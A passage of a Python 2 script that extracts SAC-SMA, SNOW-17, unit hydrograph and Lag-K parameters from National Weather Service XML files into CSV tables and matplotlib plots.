output_file.write('MAPE_Input,' + 'FALSE' + '\n')
else:
txt_file.seek(0)
for line in txt_file:
line_num += 1
if 'MAPE' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
if 'true' in line or 'TRUE' in line or 'True' in line:
#line = 'TRUE'
csv_file.write('TRUE' + ',')
output_file.write('MAPE_Input,' + 'TRUE' + '\n')
else:
for line in section:
if 'false' in line or 'FALSE' in line or 'False' in line:
#line = 'TRUE'
csv_file.write('FALSE' + ',')
output_file.write('MAPE_Input,' + 'FALSE' + '\n')
###PEADJ
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PEADJ' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PEADJ,' + line + '\n')
###LZTWM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'LZTWM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LZTWM,' + line + '\n')
###RSERV
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'RSERV' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('RSERV,' + line + '\n')
###ADIMP
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'ADIMP' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('ADIMP,' + line + '\n')
###UZK
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'UZK' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('UZK,' + line + '\n')
###SIDE
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SIDE' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SIDE,' + line + '\n')
###LZFSM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'LZFSM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LZFSM,' + line + '\n')
###LZSK
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'LZSK' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LZSK,' + line + '\n')
###SMZC_INTERVAL
txt_file.seek(0)
line_num=0
if 'SMZC_INTERVAL' not in txt_file.read():
csv_file.write('N/A' + ',')
output_file.write('SMZC_INTERVAL,' + 'N/A' + '\n')
else:
txt_file.seek(0)
for line in txt_file:
line_num += 1
if 'SMZC_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SMZC_INTERVAL,' + line + '\n')
###UZTWM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'UZTWM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('UZTWM,' + line + '\n')
###UZFWM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'UZFWM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('UZFWM,' + line + '\n')
###PCTIM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PCTIM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PCTIM,' + line + '\n')
###EFC
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'EFC' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num+sac_line:line_num+(sac_line+1)]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('EFC,' + line + '\n')
###ET_DEMAND_CURVE
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'row A' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num-1:line_num]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('JAN_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('FEB_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+1:line_num+2]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MAR_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+2:line_num+3]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('APR_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+3:line_num+4]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MAY_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+4:line_num+5]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('JUN_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+5:line_num+6]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('JUL_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+6:line_num+7]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('AUG_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+7:line_num+8]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SEP_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+8:line_num+9]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('OCT_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+9:line_num+10]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('NOV_ET,' + line + '\n')
txt_file.seek(0)
section = txt_file.readlines()[line_num+10:line_num+11]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('DEC_ET,' + line + '\n')
txt_file.close()
output_file.close()
#Delete temporary .txt file holding .xml contents
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt')
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SACSMA_Params.txt')
csv_file.write('\n')
print 'Total SAC-SMA files extracted: ' + str(basin_count)
csv_file.close()
###############################################################################################################################################################
#SNOW-17 SECTION---------------------------------------------------------------
#loop through SACSMA files in folderPath
if snow == 'on':
print 'Processing SNOW-17 parameters...'
csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_SNOW17_Params_' + param_source + '.csv', 'w')
csv_file.write('BASIN,NAME,ALAT,ELEV,TAELEV,PXADJ,SCF,MFMAX,MFMIN,UADJ,SI,NMF,TIPM,'\
'MBASE,PXTEMP,PLWHC,DAYGM,MV,SASC_INT,SNSG_INT,SWE_INT,SCTOL,WETOL,' + '\n')
for filename in glob.glob(os.path.join(folderPath, "SNOW*.xml")):
#print filename
#Define output file name
name = str(os.path.basename(filename)[:])
name = name.replace('SNOW17_', '')
name = name.replace('_UpdateStates.xml', '')
spl_name = name.split('_')[1]
#print name
csv_file.write(name + ',')
csv_file.write(spl_name + ',')
#Open .xml file and temporary .txt file to write .xml contents to
xml_file = open(filename, 'r')
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w')
#Write contents of .xml file to the temporary .txt file
for line in xml_file:
txt_file.write(line)
#Close the open files
xml_file.close()
txt_file.close()
#Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r')
output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SNOW17_Params.txt', 'w')
#Write data headers
output_file.write('PARAMETER,VALUE' + '\n')
###ALAT
#Find line number with ALAT value
#Line number is saved when loop breaks
line_num = 0
for line in txt_file:
line_num += 1
if 'ALAT' in line:
break
#Set cursor back to beginning of txt_file that is being read
txt_file.seek(0)
#Section/line of .txt file with desired parameter value
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
#Write only numbers and decimals to output file
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('ALAT,' + line + '\n')
###ELEV
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'ELEV' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('ELEV,' + line + '\n')
###TAELEV
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'TAELEV' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('TAELEV,' + line + '\n')
###PXADJ
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PXADJ' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PXADJ,' + line + '\n')
###SCF
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SCF' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SCF,' + line + '\n')
###MFMAX
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'MFMAX' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MFMAX,' + line + '\n')
###MFMIN
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'MFMIN' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MFMIN,' + line + '\n')
###UADJ
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'UADJ' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('UADJ,' + line + '\n')
###SI
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SI' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SI,' + line + '\n')
###NMF
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'NMF' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('NMF,' + line + '\n')
###TIPM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'TIPM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('TIPM,' + line + '\n')
###MBASE
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'MBASE' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MBASE,' + line + '\n')
###PXTEMP
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PXTEMP' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PXTEMP,' + line + '\n')
###PLWHC
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'PLWHC' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('PLWHC,' + line + '\n')
###DAYGM
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'DAYGM' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('DAYGM,' + line + '\n')
###MV
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'MV' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('MV,' + line + '\n')
###SASC_OUTPUT_TS_INTERVAL
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SASC_OUTPUT_TS_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SASC_OUTPUT_TS_INTERVAL,' + line + '\n')
###SNSG_OUTPUT_TS_INTERVAL
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SNSG_OUTPUT_TS_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SNSG_OUTPUT_TS_INTERVAL,' + line + '\n')
###SWE_OUTPUT_TS_INTERVAL
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SWE_OUTPUT_TS_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SWE_OUTPUT_TS_INTERVAL,' + line + '\n')
###SCTOL
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'SCTOL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('SCTOL,' + line + '\n')
###WETOL
txt_file.seek(0)
line_num=0
for line in txt_file:
line_num += 1
if 'WETOL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('WETOL,' + line + '\n' + '\n')
###AREA_DEPLETION_CURVE
output_file.write('\n' + 'AREA_DEPLETION_CURVE' + '\n')
txt_file.seek(0)
i = 0
for line in txt_file:
if 'row A' in line and 'B=' not in line:
i += 1
line = re.sub("[^0123456789\.\-]", "", line)
output_file.write(str(i) + ',' + line + '\n')
###AREA_ELEVATION_CURVE
output_file.write('\n' + 'AREA_ELEVATION_CURVE' + '\n')
txt_file.seek(0)
AREA = []
ELEV = []
for line in txt_file:
if 'row A' in line and 'B=' in line:
line = re.sub("[^0123456789\.\-\"]", "", line)
line = line.replace('""', ',')
line = line.replace ('"', '')
s1,s2 = line.split(',')
AREA.append(s2)
ELEV.append(s1)
output_file.write(line + '\n')
if len(AREA) > 0:
fig, ax1 = plt.subplots()
#Plot the data
ax1.plot(ELEV, AREA, color='black', label='AEC', linewidth='2', zorder=5)
ax1.plot(ELEV, AREA, 'o', color='black', ms=8, zorder=5, alpha=0.75)
#ax1.fill_between(x, AREA,facecolor='gray', alpha=0.25)
#ax1.minorticks_on()
ax1.grid(which='major', axis='both', color='black', linestyle='-', zorder=3)
ax1.grid(which='minor', axis='both', color='grey', linestyle='-', zorder=3)
majorLocator = MultipleLocator(.10)
ax1.yaxis.set_major_locator(majorLocator)
ax1.xaxis.set_minor_locator(AutoMinorLocator(2))
ax1.set_xlabel('Elevation')
ax1.set_ylabel('Area (% Below)')
ax1.set_ylim([-0.05,1.05])
#add plot legend with location and size
ax1.legend(loc='upper left', prop={'size':10})
plt.title(name + ' Area Elevation Curve')
figname = maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\AEC_plots\\' + name + '_AEC.png'
plt.savefig(figname, dpi=100)
plt.clf()
plt.close()
#Turn interactive plot mode off (don't show figures)
plt.ioff()
txt_file.close()
output_file.close()
#Delete temporary .txt file holding .xml contents
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt')
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_SNOW17_Params.txt')
csv_file.write('\n')
csv_file.close()
###############################################################################################################################################################
#UNIT HG SECTION---------------------------------------------------------------
#loop through UNITHG .xlm files in folderPath
if uh == 'on':
print 'Processing UH parameters...'
csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_UHG_Params_' + param_source + '.csv', 'w')
csv_file.write('BASIN, AREA (mi2), Interval (hours),')
t = 0
while t < 600:
csv_file.write(str(t) + ',')
t += 6
csv_file.write('\n')
for filename in glob.glob(os.path.join(folderPath, "UNITHG*.xml")):
#print filename
#Define output file name
name = str(os.path.basename(filename)[:])
name = name.replace('UNITHG_', '')
name = name.replace('_UpdateStates.xml', '')
#print name
csv_file.write(name + ',')
#Open .xml file and temporary .txt file to write .xml contents to
xml_file = open(filename, 'r')
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w')
#Write contents of .xml file to the temporary .txt file
for line in xml_file:
txt_file.write(line)
#Close the open files
xml_file.close()
txt_file.close()
#Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r')
output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_UNITHG_Params.txt', 'w')
#Write data headers
output_file.write('PARAMETER,VALUE' + '\n')
###UHG_DURATION
#Find line number with UHG_DURATION value
#Line number is saved when loop breaks
line_num = 0
for line in txt_file:
line_num += 1
if 'UHG_DURATION' in line:
break
#Set cursor back to beginning of txt_file that is being read
txt_file.seek(0)
#Section/line of .txt file with desired parameter value
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
#Write only numbers and decimals to output file
line = re.sub("[^0123456789\.\-]", "", line)
output_file.write('UHG_DURATION,' + line + '\n')
###DRAINAGE_AREA
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'DRAINAGE_AREA' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
area = line
csv_file.write(area + ',')
output_file.write('DRAINAGE_AREA,' + line + '\n')
###UHG_INTERVAL
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'UHG_INTERVAL' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
interval = line
csv_file.write(interval + ',')
output_file.write('UHG_INTERVAL,' + line + '\n')
###CONSTANT_BASE_FLOW
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'CONSTANT_BASE_FLOW' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
#const_bf = line
#csv_file.write(const_bf + ',')
output_file.write('CONSTANT_BASE_FLOW,' + line + '\n')
###UHG_ORDINATES
output_file.write ('\n' + 'UHG_ORDINATES' + '\n')
output_file.write('0,0' + '\n')
txt_file.seek(0)
UHG_time = []
UHG_flow = []
#Set time 0 values
ordinate = 0
flow = 0
csv_file.write('0' + ',')
UHG_time.append(ordinate)
UHG_flow.append(ordinate)
for line in txt_file:
if 'row A' in line:
ordinate = ordinate + 6
UHG_time.append(ordinate)
line = re.sub("[^0123456789\.\-]", "", line)
line_float = float(line)
csv_file.write(line + ',')
UHG_flow.append(line_float)
output_file.write(str(ordinate) + ',' + line + '\n')
#Get max UHG time value
max_time = numpy.max(UHG_time)
x = range(0,max_time+6,6)
if uh_plots == 'on':
fig, ax1 = plt.subplots()
#Plot the data
ax1.plot(UHG_time, UHG_flow, color='black', label='UHG', linewidth='2', zorder=5)
ax1.plot(UHG_time, UHG_flow, 'o', color='black', ms=4, zorder=5, alpha=0.75)
ax1.fill_between(x,UHG_flow,facecolor='gray', alpha=0.25)
#ax1.minorticks_on()
ax1.grid(which='major', axis='both', color='black', linestyle='-', zorder=3)
ax1.grid(which='minor', axis='both', color='grey', linestyle='-', zorder=3)
majorLocator = MultipleLocator(6)
ax1.xaxis.set_major_locator(majorLocator)
ax1.yaxis.set_minor_locator(AutoMinorLocator(2))
ax1.set_xlabel('Time (hr)')
ax1.set_ylabel('Flow (cfs)')
#Make tick labels smaller/rotate for long UHGs
if max_time >= 100:
for label in ax1.xaxis.get_ticklabels():
label.set_fontsize(8)
if max_time >= 160:
for label in ax1.xaxis.get_ticklabels():
label.set_fontsize(6)
plt.xticks(rotation=90)
majorLocator = MultipleLocator(12)
ax1.xaxis.set_major_locator(majorLocator)
ax1.set_xlim([0,max_time+3])
plt.ylim(ymin=0)
#add plot legend with location and size
ax1.legend(loc='upper right', prop={'size':10})
plt.title(name + ' UHG / ' + 'Area (mi2) = ' + area)
figname = maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\UHG_plots\\' + name + '_UHG.png'
plt.savefig(figname, dpi=100)
plt.clf()
plt.close()
#Turn interactive plot mode off (don't show figures)
plt.ioff()
txt_file.close()
output_file.close()
csv_file.write('\n')
#Delete temporary .txt file holding .xml contents
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt')
os.remove(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_UNITHG_Params.txt')
csv_file.close()
###############################################################################################################################################################
#LAG-K SECTION---------------------------------------------------------------
#loop through Lag-K .xlm files in folderPath
if lag_k == 'on':
print 'Processing LAG-K parameters...'
csv_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + '_' + RFC + '_LAGK_Params_' + param_source + '.csv', 'w')
csv_file.write('BASIN,Current Outflow,Current Storage,JK,JLAG,LAG1,Q1,LAG2,Q2,LAG3,Q3,LAG4,Q4,LAG5,Q5,LAG6,Q6,LAG7,Q7,LAG8,Q8,LAG9,Q9,LAG10,Q10,LAG11,Q11,LAG12,Q12,LAG13,Q13,LAG14,Q14,K1,KQ1,K2,KQ2,K3,KQ3,K4,KQ4,K5,KQ5,K6,KQ6,K7,KQ7,K8,KQ8,K9,KQ9,K10,KQ10,K11,KQ11,K12,KQ12,K13,KQ13,K14,KQ14'+'\n')
basin_count = 0
for filename in glob.glob(os.path.join(folderPath, "LAGK*.xml")):
#print filename
lag_time = []
lag_Q = []
K_time = []
K_Q = []
#Define output file name
name = str(os.path.basename(filename)[:])
name = name.replace('LAGK_', '')
name = name.replace('_UpdateStates.xml', '')
#print name
csv_file.write(name + ',')
#Open .xml file and temporary .txt file to write .xml contents to
xml_file = open(filename, 'r')
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'w')
#Write contents of .xml file to the temporary .txt file
for line in xml_file:
txt_file.write(line)
#Close the open files
xml_file.close()
txt_file.close()
#Open .txt file with .xml contents in read mode and create output .txt file where parameters will be written
txt_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '.txt', 'r')
output_file = open(maindir + '\\NWS\\Python\\Extract_Hydro_Params\\' + RFC + '\\Params_' + param_source +'\\' + name + '_LAGK_Params.txt', 'w')
### CURRENT_OUTFLOW
#Find line number with CURRENT_OUTFLOW value
#Line number is saved when loop breaks
line_num = 0
check = 'na'
for line in txt_file:
line_num += 1
if 'CURRENT_OUTFLOW' in line:
check = 'go'
break
#Set cursor back to beginning of txt_file that is being read
txt_file.seek(0)
#Section/line of .txt file with desired parameter value
section = txt_file.readlines()[line_num:line_num+1]
if check != 'go':
csv_file.write('na,')
output_file.write('CURRENT_OUTFLOW,' + 'na' + '\n')
else:
for line in section:
#Write only numbers and decimals to output file
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('CURRENT_OUTFLOW,' + line + '\n')
### CURRENT_STORAGE
txt_file.seek(0)
line_num = 0
check = 'na'
for line in txt_file:
line_num += 1
if 'CURRENT_STORAGE' in line:
check = 'go'
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
if check != 'go':
csv_file.write('na,')
output_file.write('CURRENT_STORAGE,' + 'na' + '\n')
else:
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('CURRENT_STORAGE,' + line + '\n')
### Inflow Basin
txt_file.seek(0)
line_num = 0
check = 'na'
for line in txt_file:
line_num += 1
if 'TSIDA' in line:
check = 'go'
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
if check == 'go':
for line in section:
inflow_basin = line[19:-15]
basin_count += 1
### JK
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'id="JK"' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+2]
for line in section:
if '<!--' not in line:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('JK,' + line + '\n')
jk = int(line)
break
### JLAG
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'id="JLAG"' in line:
break
txt_file.seek(0)
section = txt_file.readlines()[line_num:line_num+1]
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('JLAG,' + line + '\n')
jlag = int(line)
### LAGQ
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'LAGQ_PAIRS' in line:
break
txt_file.seek(0)
if jlag == 0:
end_line = 3
else:
end_line = (jlag * 2)+2
section = txt_file.readlines()[line_num+2:line_num+end_line]
count = 0
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('LAGQ_PAIRS,' + line + '\n')
if count % 2 ==0:
lag_time.append(float(line))
else:
lag_Q.append(float(line))
count += 1
#print lag_time
#print lag_Q
if jlag == 0:
jlag = 1
csv_file.write('0' + ',')
while jlag < 14:
csv_file.write('' + ',' + '' + ',')
jlag += 1
### KQ
txt_file.seek(0)
line_num = 0
for line in txt_file:
line_num += 1
if 'KQ_PAIRS' in line:
break
txt_file.seek(0)
end_line = (jk * 2)+3
txt_file.seek(0)
if jk == 0:
end_line = 3
else:
end_line = (jk * 2)+2
section = txt_file.readlines()[line_num+2:line_num+end_line]
count = 0
for line in section:
line = re.sub("[^0123456789\.\-]", "", line)
csv_file.write(line + ',')
output_file.write('KQ_PAIRS,' + line + '\n')
if count % 2 ==0:
K_time.append(float(line))
else:
K_Q.append(float(line))
count += 1
#print K_time
#print K_Q
if jk == 0:
jk = 1
csv_file.write('0' + ',')
while jk < 14:
csv_file.write('' + ',' + '' + ',')
jk += 1
txt_file.close()
output_file.close()
csv_file.write('\n')
#Get max Lag/K time value
max_time = numpy.max(lag_time + K_time)
x = range(0,int(max_time)+6,6)
if lag_plots == 'on' and len(K_time)>1 and len(lag_time)>1:
fig, ax1 = plt.subplots()
#Plot the data
ax1.plot(lag_time, lag_Q, 'g-o', label='LAG', linewidth='2', zorder=5, ms=5)
